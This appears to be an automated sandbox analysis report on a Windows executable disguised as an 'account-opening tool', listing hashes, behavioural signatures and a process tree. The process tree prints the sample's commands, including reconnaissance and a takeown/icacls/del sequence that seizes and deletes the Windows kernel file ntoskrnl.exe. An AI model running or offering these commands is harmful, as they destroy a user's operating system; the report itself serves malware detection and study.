Analysis
-
max time kernel
64s -
max time network
64s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05-10-2024 08:55
Static task
static1
Behavioral task
behavioral1
Sample
Furry开户工具.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Furry开户工具.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
libcurl-x64.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
libcurl-x64.dll
Resource
win10v2004-20240802-en
Errors
General
-
Target
Furry开户工具.exe
-
Size
370KB
-
MD5
75be151829b2bc2e9e081c1ede0fd0e0
-
SHA1
8cb585ca1e98abe3e3d9dfad899ba516d3583033
-
SHA256
43ed2eb30e5053663f55617b39dc89e8cce80b896c1c57ed507dd52be94c597b
-
SHA512
e6f88991819d41dfca51d682f28a829aa745e96e5bc674dac0e7b96e4a03ce6af5a1179fed29f9b73a0239fc695acb98b5b0f044735f9faaa55feaa3e4ca4266
-
SSDEEP
6144:QncHno/Bv6GDKHa1no2/bMgnwj+gQjjU0zhwnJBlTK:ULvDU2/bMZjtgjxzUlTK
Malware Config
Signatures
-
Possible privilege escalation attempt 2 IoCs
Processes:
icacls.exetakeown.exepid Process 5012 icacls.exe 3424 takeown.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid Process 3424 takeown.exe 5012 icacls.exe -
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 208.67.222.222 Destination IP 208.67.222.222 Destination IP 208.67.222.222 -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in System32 directory 3 IoCs
Processes:
OfficeClickToRun.exedescription ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-wal OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-shm OfficeClickToRun.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
OfficeClickToRun.exedescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 OfficeClickToRun.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz OfficeClickToRun.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString OfficeClickToRun.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
OfficeClickToRun.exedescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS OfficeClickToRun.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily OfficeClickToRun.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU OfficeClickToRun.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies data under HKEY_USERS 26 IoCs
Processes:
OfficeClickToRun.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" OfficeClickToRun.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
Furry开户工具.exepid Process 2356 Furry开户工具.exe 2356 Furry开户工具.exe -
Suspicious behavior: LoadsDriver 64 IoCs
Processes:
pid Process 3672 2084 3828 3556 3504 3888 4504 4784 5072 5056 4136 4500 384 2284 1804 2360 4444 2876 4940 3196 1224 4772 1784 4512 3724 4816 4612 1956 3708 1672 3640 1164 1324 4900 4672 4728 3928 2172 4172 2404 4476 3744 4752 4748 4652 4316 3740 1076 1028 3968 3112 4608 3244 5060 1516 4676 3832 4732 3840 3420 2500 3076 2956 4376 -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
WMIC.exetakeown.exedescription pid Process Token: SeIncreaseQuotaPrivilege 3368 WMIC.exe Token: SeSecurityPrivilege 3368 WMIC.exe Token: SeTakeOwnershipPrivilege 3368 WMIC.exe Token: SeLoadDriverPrivilege 3368 WMIC.exe Token: SeSystemProfilePrivilege 3368 WMIC.exe Token: SeSystemtimePrivilege 3368 WMIC.exe Token: SeProfSingleProcessPrivilege 3368 WMIC.exe Token: SeIncBasePriorityPrivilege 3368 WMIC.exe Token: SeCreatePagefilePrivilege 3368 WMIC.exe Token: SeBackupPrivilege 3368 WMIC.exe Token: SeRestorePrivilege 3368 WMIC.exe Token: SeShutdownPrivilege 3368 WMIC.exe Token: SeDebugPrivilege 3368 WMIC.exe Token: SeSystemEnvironmentPrivilege 3368 WMIC.exe Token: SeRemoteShutdownPrivilege 3368 WMIC.exe Token: SeUndockPrivilege 3368 WMIC.exe Token: SeManageVolumePrivilege 3368 WMIC.exe Token: 33 3368 WMIC.exe Token: 34 3368 WMIC.exe Token: 35 3368 WMIC.exe Token: 36 3368 WMIC.exe Token: SeIncreaseQuotaPrivilege 3368 WMIC.exe Token: SeSecurityPrivilege 3368 WMIC.exe Token: SeTakeOwnershipPrivilege 3368 WMIC.exe Token: SeLoadDriverPrivilege 3368 WMIC.exe Token: SeSystemProfilePrivilege 3368 WMIC.exe Token: SeSystemtimePrivilege 3368 WMIC.exe Token: SeProfSingleProcessPrivilege 3368 WMIC.exe Token: SeIncBasePriorityPrivilege 3368 WMIC.exe Token: SeCreatePagefilePrivilege 3368 WMIC.exe Token: SeBackupPrivilege 3368 WMIC.exe Token: SeRestorePrivilege 3368 WMIC.exe Token: SeShutdownPrivilege 3368 WMIC.exe Token: SeDebugPrivilege 3368 WMIC.exe Token: SeSystemEnvironmentPrivilege 3368 WMIC.exe Token: SeRemoteShutdownPrivilege 3368 WMIC.exe Token: SeUndockPrivilege 3368 WMIC.exe Token: SeManageVolumePrivilege 3368 WMIC.exe Token: 33 3368 WMIC.exe Token: 34 3368 WMIC.exe Token: 35 3368 WMIC.exe Token: 36 3368 WMIC.exe Token: SeTakeOwnershipPrivilege 3424 takeown.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Furry开户工具.exepid Process 2356 Furry开户工具.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
OfficeClickToRun.exepid Process 2092 OfficeClickToRun.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
Furry开户工具.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 2356 wrote to memory of 648 2356 Furry开户工具.exe 83 PID 2356 wrote to memory of 648 2356 Furry开户工具.exe 83 PID 648 wrote to memory of 3368 648 cmd.exe 84 PID 648 wrote to memory of 3368 648 cmd.exe 84 PID 2356 wrote to memory of 3440 2356 Furry开户工具.exe 86 PID 2356 wrote to memory of 3440 2356 Furry开户工具.exe 86 PID 3440 wrote to memory of 2980 3440 cmd.exe 87 PID 3440 wrote to memory of 2980 3440 cmd.exe 87 PID 2356 wrote to memory of 4844 2356 Furry开户工具.exe 88 PID 2356 wrote to memory of 4844 2356 Furry开户工具.exe 88 PID 4844 wrote to memory of 4560 4844 cmd.exe 89 PID 4844 wrote to memory of 4560 4844 cmd.exe 89 PID 2356 wrote to memory of 1960 2356 Furry开户工具.exe 91 PID 2356 wrote to memory of 1960 2356 Furry开户工具.exe 91 PID 1960 wrote to memory of 3424 1960 cmd.exe 92 PID 1960 wrote to memory of 3424 1960 cmd.exe 92 PID 2356 wrote to memory of 3952 2356 Furry开户工具.exe 93 PID 2356 wrote to memory of 3952 2356 Furry开户工具.exe 93 PID 3952 wrote to memory of 5012 3952 cmd.exe 94 PID 3952 wrote to memory of 5012 3952 cmd.exe 94 PID 2356 wrote to memory of 5032 2356 Furry开户工具.exe 95 PID 2356 wrote to memory of 5032 2356 Furry开户工具.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\Furry开户工具.exe"C:\Users\Admin\AppData\Local\Temp\Furry开户工具.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic nicconfig get ipaddress2⤵
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Windows\System32\Wbem\WMIC.exewmic nicconfig get ipaddress3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com2⤵
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:2980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo2⤵
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:4560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c takeown /f "C:\Windows\System32\ntoskrnl.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\ntoskrnl.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\System32\ntoskrnl.exe" /grant Admin:F2⤵
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\ntoskrnl.exe" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del "C:\Windows\System32\ntoskrnl.exe" /f /s /q2⤵PID:5032
-
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:3372
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:748